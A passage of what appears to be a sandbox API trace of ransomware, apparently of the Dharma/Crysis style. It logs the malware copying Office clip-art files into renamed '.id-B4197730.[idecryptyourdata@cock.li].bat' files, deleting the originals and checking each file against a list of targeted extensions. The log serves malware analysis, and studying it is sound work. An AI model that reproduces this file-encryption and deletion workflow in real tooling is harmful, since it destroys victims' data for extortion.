[0191.150] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0191.150] SetEndOfFile (hFile=0x334) returned 1 [0191.150] CloseHandle (hObject=0x334) returned 1 [0191.150] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.150] SetEndOfFile (hFile=0x390) returned 1 [0191.151] CloseHandle (hObject=0x390) returned 1 [0191.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0191.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf")) returned 1 [0191.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.152] lstrlenW (lpString=".doc") returned 4 [0191.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0191.152] lstrlenW (lpString=".docx") returned 5 [0191.152] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0191.152] lstrlenW (lpString=".pdf") returned 4 [0191.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0191.152] lstrlenW (lpString=".xls") returned 4 [0191.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0191.152] lstrlenW (lpString=".xlsx") returned 5 [0191.153] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0191.153] lstrlenW (lpString=".ppt") returned 4 [0191.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0191.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.153] lstrlenW (lpString=".zip") returned 4 [0191.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0191.153] lstrlenW (lpString=".rar") returned 4 [0191.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0191.153] lstrlenW (lpString=".bz2") returned 4 [0191.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0191.153] lstrlenW (lpString=".7z") returned 3 [0191.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0191.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.153] lstrlenW (lpString=".dbf") returned 4 [0191.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0191.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.153] lstrlenW (lpString=".1cd") returned 4 [0191.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0191.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF") returned 68 [0191.153] lstrlenW (lpString=".jpg") returned 4 [0191.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0191.154] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.154] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0191.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0191.155] GetLastError () returned 0x0 [0191.155] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x610c, lpOverlapped=0x0) returned 1 [0194.466] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x6110, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x6110, lpOverlapped=0x0) returned 1 [0195.695] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.695] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.695] SetEndOfFile (hFile=0x334) returned 1 [0195.695] CloseHandle (hObject=0x334) returned 1 [0195.695] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.695] SetEndOfFile (hFile=0x390) returned 1 [0195.696] CloseHandle (hObject=0x390) returned 1 [0195.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152414.wmf")) returned 1 [0195.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.753] lstrlenW (lpString=".doc") returned 4 [0195.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.753] lstrlenW (lpString=".docx") returned 5 [0195.753] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0195.753] lstrlenW (lpString=".pdf") returned 4 [0195.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.753] lstrlenW (lpString=".xls") returned 4 [0195.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.753] lstrlenW (lpString=".xlsx") returned 5 [0195.753] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0195.753] lstrlenW (lpString=".ppt") returned 4 [0195.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.753] lstrlenW (lpString=".zip") returned 4 [0195.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.753] lstrlenW (lpString=".rar") returned 4 [0195.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.753] lstrlenW (lpString=".bz2") returned 4 [0195.753] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.753] lstrlenW (lpString=".7z") returned 3 [0195.753] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.753] lstrlenW (lpString=".dbf") returned 4 [0195.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.754] lstrlenW (lpString=".1cd") returned 4 [0195.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152414.WMF") returned 68 [0195.754] lstrlenW (lpString=".jpg") returned 4 [0195.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.754] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.754] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.755] GetLastError () returned 0x0 [0195.755] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x4030, lpOverlapped=0x0) returned 1 [0195.780] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4040, lpOverlapped=0x0) returned 1 [0195.781] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.781] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.781] SetEndOfFile (hFile=0x388) returned 1 [0195.781] CloseHandle (hObject=0x388) returned 1 [0195.781] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.782] SetEndOfFile (hFile=0x380) returned 1 [0195.782] CloseHandle (hObject=0x380) returned 1 [0195.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152556.wmf")) returned 1 [0195.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.783] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.784] lstrlenW (lpString=".doc") returned 4 [0195.784] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString=".docx") returned 5 [0195.784] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0195.784] lstrlenW (lpString=".pdf") returned 4 [0195.784] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString=".xls") returned 4 [0195.784] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.784] lstrlenW (lpString=".xlsx") returned 5 [0195.784] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0195.784] lstrlenW (lpString=".ppt") returned 4 [0195.784] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.784] lstrlenW (lpString=".zip") returned 4 [0195.784] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.784] lstrlenW (lpString=".rar") returned 4 [0195.784] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString=".bz2") returned 4 [0195.784] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString=".7z") returned 3 [0195.784] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.784] lstrlenW (lpString=".dbf") returned 4 [0195.784] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.784] lstrlenW (lpString=".1cd") returned 4 [0195.784] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152556.WMF") returned 68 [0195.784] lstrlenW (lpString=".jpg") returned 4 [0195.784] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.785] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.785] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.786] GetLastError () returned 0x0 [0195.786] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2a80, lpOverlapped=0x0) returned 1 [0195.787] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2a90, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2a90, lpOverlapped=0x0) returned 1 [0195.789] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.789] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.789] SetEndOfFile (hFile=0x388) returned 1 [0195.789] CloseHandle (hObject=0x388) returned 1 [0195.789] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.789] SetEndOfFile (hFile=0x380) returned 1 [0195.790] CloseHandle (hObject=0x380) returned 1 [0195.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152560.wmf")) returned 1 [0195.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.792] lstrlenW (lpString=".doc") returned 4 [0195.792] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString=".docx") returned 5 [0195.792] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0195.792] lstrlenW (lpString=".pdf") returned 4 [0195.792] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString=".xls") returned 4 [0195.792] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.792] lstrlenW (lpString=".xlsx") returned 5 [0195.792] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0195.792] lstrlenW (lpString=".ppt") returned 4 [0195.792] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.792] lstrlenW (lpString=".zip") returned 4 [0195.792] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.792] lstrlenW (lpString=".rar") returned 4 [0195.792] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString=".bz2") returned 4 [0195.792] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString=".7z") returned 3 [0195.792] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.792] lstrlenW (lpString=".dbf") returned 4 [0195.792] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.793] lstrlenW (lpString=".1cd") returned 4 [0195.793] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152560.WMF") returned 68 [0195.793] lstrlenW (lpString=".jpg") returned 4 [0195.793] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.793] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.793] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.794] GetLastError () returned 0x0 [0195.794] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xe70, lpOverlapped=0x0) returned 1 [0195.795] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xe80, lpOverlapped=0x0) returned 1 [0195.796] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.796] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.796] SetEndOfFile (hFile=0x388) returned 1 [0195.796] CloseHandle (hObject=0x388) returned 1 [0195.796] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.796] SetEndOfFile (hFile=0x380) returned 1 [0195.797] CloseHandle (hObject=0x380) returned 1 [0195.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.798] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152568.wmf")) returned 1 [0195.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.798] lstrlenW (lpString=".doc") returned 4 [0195.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.798] lstrlenW (lpString=".docx") returned 5 [0195.798] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0195.798] lstrlenW (lpString=".pdf") returned 4 [0195.798] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.798] lstrlenW (lpString=".xls") returned 4 [0195.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.798] lstrlenW (lpString=".xlsx") returned 5 [0195.798] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0195.798] lstrlenW (lpString=".ppt") returned 4 [0195.799] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.799] lstrlenW (lpString=".zip") returned 4 [0195.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0195.799] lstrlenW (lpString=".rar") returned 4 [0195.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0195.799] lstrlenW (lpString=".bz2") returned 4 [0195.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0195.799] lstrlenW (lpString=".7z") returned 3 [0195.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0195.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.799] lstrlenW (lpString=".dbf") returned 4 [0195.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0195.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.799] lstrlenW (lpString=".1cd") returned 4 [0195.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0195.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152568.WMF") returned 68 [0195.799] lstrlenW (lpString=".jpg") returned 4 [0195.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0195.800] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.800] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0195.800] GetLastError () returned 0x0 [0195.801] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xd28, lpOverlapped=0x0) returned 1 [0195.802] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xd30, lpOverlapped=0x0) returned 1 [0195.803] ReadFile (in: hFile=0x380, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.803] WriteFile (in: hFile=0x388, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0195.803] SetEndOfFile (hFile=0x388) returned 1 [0195.803] CloseHandle (hObject=0x388) returned 1 [0195.804] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.804] SetEndOfFile (hFile=0x380) returned 1 [0195.805] CloseHandle (hObject=0x380) returned 1 [0195.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0195.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152570.wmf")) returned 1 [0195.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152570.WMF") returned 68 [0195.806] lstrlenW (lpString=".doc") returned 4 [0195.806] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0195.806] lstrlenW (lpString=".docx") returned 5 [0195.806] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0195.806] lstrlenW (lpString=".pdf") returned 4 [0195.806] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0195.806] lstrlenW (lpString=".xls") returned 4 [0195.806] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0195.806] lstrlenW (lpString=".xlsx") returned 5 [0195.806] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0195.806] lstrlenW (lpString=".ppt") returned 4 [0195.806] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0195.806] lstrlenW (lpString="C:\\Program Files\\Microsoft 